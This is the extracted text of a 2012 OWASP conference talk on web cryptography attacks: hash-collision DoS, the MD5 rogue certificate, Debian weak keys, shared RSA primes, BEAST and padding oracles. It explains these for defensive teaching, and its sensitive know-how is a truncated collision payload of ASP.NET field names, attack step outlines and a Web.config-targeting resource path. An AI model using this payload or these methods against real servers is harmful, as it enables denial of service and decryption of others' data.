Malicious_Math_-_Final
advertisement
Malicious Math:
Recent Real-World Cryptographical and
Computational Threats on the Web
Derek Soeder
Ridgeway Internet Security, L.L.C.
derek @ ridgewayis.com
OWASP Dallas
August 1, 2012
Content copyright © Ridgeway Internet Security, L.L.C.
Template copyright
© TheFoundation
OWASP Foundation
Copyright
© The OWASP
Permission is granted to copy, distribute and/or modify this document
under the terms of the OWASP License.
The OWASP Foundation
http://www.owasp.org
Overview
Hash collision denial of service (Dec. 2011)
MD5 collision rogue cert. (July – Dec. 2008)
Debian weak SSL keys (Sept. 2006 – May 2008)
Insuff. key randomness (Dec. 2009 – Feb. 2012)
BEAST client-side SSL attack (Sept. – Dec. 2011)
Padding oracle decryption (Apr. – Sept. 2010)
OWASP
Hash Collision
Denial of Service
OWASP
"Algorithmic complexity attacks"
• Crosby & Wallace paper (Aug. 2003)
• "Algorithmic complexity attacks":
use knowledge of a system's algorithms
to induce worst-case performance
• Many Web app frameworks keep field
name-value pairs in hash tables
• ASP.NET, Java, PHP, Python, Ruby, etc.
• Hash tables use hash functions
• Attacker can abuse predictable hash
functions to produce worst case
OWASP
About Hash Tables
• List:
• Looking up is slow
• Adding an item means looking for it
first, if duplicate items are not allowed
• Hash table:
• Basically a bunch of lists
• Looking up is less slow,
if lists are utilized evenly
• Hash function decides in which list
each item belongs
OWASP
Hash Collision Denial of Service
• n.runs advisory (Dec. 2011):
• Send hundreds of KBs to MBs of field
names that all hash to a single value
• Only one list of hash table is utilized
Looking up is slow
Adding is slow
• 100,000's of maximally inefficient
look-ups and adds hog CPU time
• More bang for attacker's bandwidth
OWASP
Hash Collision DoS – ASP.NET
• The hash function, MSCORWKS!HashString:
for (dwhash = 5381; *pwch != 0; pwch++)
dwhash = (dwhash * 33) ^ *pwch;
• Example collision: "0_" 5859434 "1~"
5381 * 33 = 177573
177557 * 33 = 5859381
^ 48 ('0') = 177557
^ 95 ('_') = 5859434
5381 * 33 = 177573
177556 * 33 = 5859348
^ 49 ('1') = 177556
^ 126 ('~') = 5859434
OWASP
Hash Collision DoS – ASP.NET (2)
• n.runs advisory presents tricks to make
computing hash collisions feasible
• Proof of concept with 10,000's of field names
that all hash to 31337 in ASP.NET:
3QBZJK5ZX=&NEUQ7BWAV6=&6902D0YP6J=&9PZGHCDJYD=&NU73S3KNV=&IF686
YJQJ8K=&9XUUCJEENJ=&FX4A75F91FM=&IGJKQVBZAVK=&LJVJV6J3UZ=&X7GJ5
MWXY=&6AVIZWTVK=&WQNIQ7OZMS=&IM1VKMZHK6F=&DO9WX2R9H=&RYLZSIQT8V
=&KR9BBFUH2E=&UI8N4SWVWW=&TL5F6URVPP=&B1P81FWDSVV=&CM6Y80XSAO=&
LE72GBPWB=&EEFMULEXC=&M6FKM13WB=&MGN8123XA2K=&ZMI35GXHMN=&LXQQO
M138LL=&XXST36DRX=&JRYRV54TFZ=&LGG3X9MFN7=&MH1NI402I22=&MHFIKIM
0TEH=&BWPRVCQ4X3=&RM6K7V75WZ=&SMIAE6PAL4=&MOCGW14ZU7=&I0JKKKOG7
EN=&Q4B9V7L3VZ=&23UAYU5B31=&9TRJE0XRWQ=&3Q3LKPC2K0=&D3ACY8973E=
&VGJPMCQHP=&AV6THWSCA7=&MH5SM8NPWB1=&P57KEP668X=&81C4LQ4DFY=&MP
JBASYMRM=&25EWGNN5NE=&R1FFQRM5T=&28HUK0QHY=&HQN8TCEF8O=& ...
OWASP
Hash Collision DoS – ASP.NET Demo
OWASP
MD5 Collision Rogue
Certificate
OWASP
A Brief History of MD5
• 1992: MD5 published as the latest
cryptographic (secure) hash function
• 1993: early indication of weaknesses
• 1996: serious indication of weakness;
switching to another algorithm recommended
• 2004: broken—collision computed in hour
• 2005: "clearly broken"—colliding documents
and certificates demonstrated
• 2006: BROKEN—collision computed in minute
OWASP
• 2008: CAs still issuing digital certificates with
signed MD5 hash
OWASP
Certificate Constraints – End Entity
OWASP
Certificate Constraints – CA
OWASP
MD5 Collision Rogue Certificate
• Did you know: MD5 is broken?
• Chosen-prefix collision:
• Real certificate and rogue
certificate can start with
whatever bytes (P and P')
• Control of real and rogue
middle bytes (A/B/NC and
A'/B'/NC') produces collision
• Any end bytes (S) after NC
and NC' need to be identical
OWASP
MD5 Collision Rogue Certificate - P and P'
OWASP
MD5 Collision Rogue Certificate - B and B'
OWASP
MD5 Collision Rogue Certificate - NC and NC'
OWASP
MD5 Collision Rogue Certificate - S
OWASP
MD5 Collision Rogue Certificate – Attack
1. Predict all CA-determined fields
•
•
Serial number
Validity period (date and time in seconds)
2. Generate B/NC and B'/NC'
•
•
•
B/NC are buried in public key submitted to CA
B'/NC' are hidden in ignored part of rogue certificate
Only after CA MD5's everything—serial no., validity
period, public key, etc.—is there a collision, or not
3. Request certificate at exact right time
•
With luck, CA signs predicted MD5 hash
OWASP
MD5 Collision Rogue Certificate – No Demo
It helps to have this handy:
OWASP
MD5 Collision Rogue Certificate – Coda
• June 2012: Microsoft stated Flame malware
"used a cryptographic collision attack in combination
with the terminal server licensing service certificates
to sign code as if it came from Microsoft"
• SRD blog reported "signature algorithm on this
certificate was md5RSA" with "validity periods and
certificate serial numbers that could be predicted
with high probability"
Did you know: MD5 is broken?
OWASP
Public Service Announcement
• Microsoft to ban < 1024-bit RSA keys in August:
http://blogs.technet.com/b/pki/archive/2012/06/
12/rsa-keys-under-1024-bits-are-blocked.aspx
• 512-bit RSA keys rumored to have been factored
(meaning attacker determines private key from
public key) and used in attacks in 2010-2011:
http://blog.fox-it.com/2011/11/21/rsa-512certificates-abused-in-the-wild/
OWASP
Debian Weak SSL Keys
OWASP
Debian Weak SSL Keys
•
In May 2006, a Debian developer commented
out a line of OpenSSL code:
static void ssleay_rand_add(const void *buf, int num, double add)
{
...
MD_Init(&m);
MD_Update(&m,local_md,MD_DIGEST_LENGTH);
...
MD_Update(&m,buf,j);
MD_Update(&m,(unsigned char *)&(md_c[0]),sizeof(md_c));
MD_Final(&m,local_md);
•
•
The change was accepted and shipped.
In May 2008, someone realized an issue…
OWASP
Debian Weak SSL Keys – Before and After
Before
After
OWASP
Debian Weak SSL Keys – Before and After
Before
After
7,666,726,705,127,208,895,288,919,735,
890,970,459,757,624,643,589,421,069,
830,971,849,657,209,631,459,735,242,
109,416,344,392,422,976,093,333,584,
038,500,684,593,076,852,885,189,507,
438,580,455,743,147,134,485,294,679,
832,330,915,083,423,208,473,608,681,
157,031,292,292,705,768,087,781,588,
880,163,985,620,734,654,395,339,047,
311,829,034,293,966,831,987,336,710,
942,003,535,010,235,278,994,988,677,
963,820 +/-
98,301
Number of possible 1024-bit RSA keys
OWASP
Debian Weak SSL Keys – How Bad?
• With crippled PRNG, number of possible keys is:
32767
×
3
98301
possible Process IDs
OpenSSL .rnd file states
keys
per arch (x86, x64, PowerPC, etc.)
per key size (512, 1024, 2048, etc.)
• Feasible to build a database of all possible keys
• Know the public key Look up private key
OWASP
Debian Weak SSL Keys – Repercussions
• All keys generated by affected build are weak
• Debian OpenSSL over roughly two year period
• GnuPG unaffected (doesn't use OpenSSL)
• SSL/TLS communications negotiated using a
weak key can be decrypted, forever
• Changing your key doesn't delete my .pcap
• SSH accounts using public-key authentication
with a weak key can be accessed
OWASP
Debian Weak SSL Keys – Demo
OWASP
Insufficient RSA Key
Randomness
OWASP
Insufficient RSA Key Randomness
• ~0.2% of RSA keys on the Web share a factor
• An RSA key has two secret, random prime factors
• If any two public keys share a prime factor,
both private keys can be compromised
OWASP
Insufficient RSA Key Randomness – How
• Public key n = secret prime p × secret prime q
• Let n1 = p1 × q1 and n2 = p2 × q2
• If p1 = p2, then n1 and n2 share a divisor (p)
•
•
•
•
Compute GCD(n1, n2) = p (way faster than factoring)
n1 ÷ p = q1
n2 ÷ p = q2
We can now compute both private keys, given only
two public keys related by coincidence
OWASP
Insufficient RSA Key Randomness – Where
• 11.4 million RSA public keys collected
• Mostly SSL certificates, some PGP keys
• EFF SSL Observatory: 7.2 million SSL certs
• 26,965 (~0.2%) shared a prime factor
• This did not seem to be related to the Debian issue
OWASP
Insufficient RSA Key Randomness – Why?
• No one knows for sure…
• Likely poor PRNG seeding
• Hypothesized that first prime is weak (low entropy), second
is more random due to entropy accumulated in the process
Distinct key (p × q1), but breakable when GCD'ed with
another key (p × q2) that happens to share first prime
• One study found embedded devices most affected
• "Ron was wrong, Whit is right"?
• Ronald Rivest – RSA, key uses two secrets
• Whitfield Diffie – DH, key uses one secret
OWASP
Insufficient RSA Key Randomness – Demo
OWASP
Insufficient RSA Key Randomness – Fix
• So what can you do about this?
Nothing.
OWASP
BEAST Client-Side SSL Attack
OWASP
BEAST – Overview
• BEAST: Browser Exploit Against SSL/TLS
• Long-recognized vulnerability, finally exploited
• Impact:
• Decrypt cookies sent via HTTPS
• Attack requires:
• Man-in-the-Middle between victim and Internet
• Agent in victim's browser (JavaScript, Java, etc.)
• Able to send cookie-bearing request and append indefinitely
• Cipher Block Chaining encryption alg. for HTTPS
• 3DES, AES, IDEA, RC2, etc.; not RC4
OWASP
About Block Ciphers
• N plaintext bytes N ciphertext bytes
• N = block size, usually 8 or 16
• Same plaintext same ciphertext (if same key)
• Electronic Codebook (ECB) mode:
• Plaintext:
• Ciphertext:
Their Su rrogate
may inte rrogate
RGVyZWtX c25lYWt5 YXNIZXJl c25lYWt5
• Cipher Block Chaining (CBC) scrambles each
plaintext block using previous ciphertext block:
• Plaintext:
• Ciphertext:
Their Su IlNjcmFt YmxlIj1Y T1IgKF4p
RGVyZWtX SE9BSXQn c0FsbENo YW5nZWQh
OWASP
BEAST – The Attack
• BEAST controls part of HTTP request (path) via
in-browser agent, and wants to decrypt cookies
• "Blockwise Chosen-Boundary Attack" (BCBA) to
obtain one byte of cookies at a time
1. Insert bytes to shift alignment of blocks, so that one
block is [(N-1) known bytes + 1 unknown byte]
2. Agent sends 1-256 guesses until encrypted guess =
encrypted [(N-1) known bytes + 1 unknown byte]
3. Now that unknown byte is known, repeat for next
unknown byte
OWASP
BEAST – BCBA HTTP Requests
POST
POST
POST
POST
POST
POST
POST
/AA
/AA
/AA
/AA
/AA
/A
/AA
AAAA HTT
AAA HTTP
AA HTTP/
A HTTP/1
HTTP/1.
HTTP/1.1
AAAAAA H
P/1.1←↓C
/1.1←↓Co
1.1←↓Coo
.1←↓Cook
1←↓Cooki
←↓Cookie
TTP/1.1← ↓Cookie:
POST /AA AAAAA HT TP/1.1←↓ Cookie:□
POST /AA AAAA HTT P/1.1←↓C ookie: L
POST /AA AAA HTTP /1.1←↓Co okie: LA
OWASP
BEAST – The Attack (2)
• BEAST Man-in-the-Middle sees ciphertext
• Essential to attack—BEAST must pre-scramble each
guess plaintext to cancel out CBC scramblings
• Remember: CBC scrambles plaintext using ciphertext
• BEAST attack in full:
1.
2.
3.
4.
5.
Agent sends partial request containing BCBA bytes
MitM sees ciphertext, tells agent what to guess
Agent appends guess to request body
Repeat at Step 2 until unknown byte is guessed
Repeat at Step 1 until all cookie bytes are guessed
OWASP
From the BEAST's mouth...
OWASP
BEAST – The Catch
• Many ways to send cookie-bearing requests:
• JavaScript, Flash, HTML5, Java, Silverlight
• But fewer work for appending to request:
• JavaScript, Flash, HTML5, Java, Silverlight
• BEAST authors used Java, but needed a SameOrigin Policy bypass zero-day for agent to work
• Presumably Oracle has patched this by now
• Victim must run BEAST agent while logged in
My take: Great research, real vulnerability, but
not as serious as browser-vuln-of-the-week
OWASP
Padding Oracle Decryption
OWASP
About Padding Oracles
• "Padding oracle" has nothing to do with
It's referring to this oracle
• Padding:
• Block ciphers operate on N-byte blocks
• Plaintext may not be multiple of N bytes
• PKCS#5 padding: pad last block with
bytes containing padding count (1-N)
• e.g.,
OWASP
About Padding Oracles (2)
• Oracle:
• Responds to questions with crypt[ograph]ic answers
based on supranormal knowledge
• Padding oracle:
Q: Does this decrypt with correct padding? c25lYWt5 YW5nZWQh
A: No.
Q: How about this one? c25lYWt4 YW5nZWQh
A: No.
...
Q: How about this one? c25lYWtX YW5nZWQh
A: Yes.
Q: kthxbai~ ^o^
OWASP
About Padding Oracles (3)
• Believe it or not, that's dangerous information
• Here's ASP.NET being obvious about it:
• But really any difference indicating decryption
failure will suffice
OWASP
Padding Oracle Attack
• "Security Flaws Induced by CBC Padding"
(Vaudenay, 2002):
• Attacker has ciphertext blocks he wants to decrypt,
sends crafted guesses to vulnerable server
• Server decrypts guesses (into garbage, but that
doesn't matter) and checks for valid padding:
• One or two decrypted guesses will look correctly padded
• The rest (≤ 255) will have invalid padding
• Padding oracle indicates which is which to attacker
This lets attacker determine a byte of plaintext
• Attacker tweaks guesses to guess next byte; repeat
OWASP
Padding Oracle Attack Illustrated
Previous
ciphertext block
Attacker
Ciphertext
block
Control block
X
CBC
Decryption
Server
Control block
Original scrambled
plaintext
Doubly scrambled
plaintext
No
Is
padding
valid?
Yes
OWASP
Padding Oracle Attack – ASP.NET
• WebResource.axd and ScriptResource.axd
• Used to retrieve resources in a way that should be
opaque to user; e.g.:
<script src="/ScriptResource.axd?d=JuN78WBP_dBUR_
BT9LH1wlP8mX-nNcENfktCX8YwH3sHG7wWwvn73TZaaChQh
Qtyzip3-kumGx1U67ntTt0sXKCn22VGvaQ3V4mXtCFgW9M1">
• Encrypted d= string refers to these files when decrypted:
Q|~/Scripts/Script1.js,~/Scripts/Script2.js,
~/Scripts/Script3.js|#|21c38a3a9b
• Other possibilities in .NET 3.5+
• e.g., r#...|||~/Web.config
• Did I mention that the padding oracle can be
used for encryption as well as decryption?
OWASP
Padding Oracle Attack – ASP.NET Demo
OWASP
Padding Oracle Attack – Whose Problem?
• ASP.NET
• ASP.NET itself: read arbitrary files
• DotNetNuke: remote code execution
• RubyOnRails
• Some captchas (
• JavaServer Faces
)
OWASP
Conclusion
OWASP
Recap
Hash collision denial of service (Dec. 2011)
MD5 collision rogue cert. (July – Dec. 2008)
Debian weak SSL keys (Sept. 2006 – May 2008)
Insuff. key randomness (Dec. 2009 – Feb. 2012)
BEAST client-side SSL attack (Sept. – Dec. 2011)
Padding oracle decryption (Apr. – Sept. 2010)
OWASP
Conclusion
• Uses fancy math
safe
• As easy bugs decline, attackers are driven toward
more exotic bugs where developers' security
understanding is weaker
• Solutions:
• Enable automatic updates for everything
• Don't use MD5 for authentication (psst... it's broken)
• Try to only use keys generated on a trusted, highentropy system; get used to replacing keys
OWASP
Questions?
Derek Soeder
Ridgeway Internet Security, L.L.C.
derek @ ridgewayis.com
@
OWASP
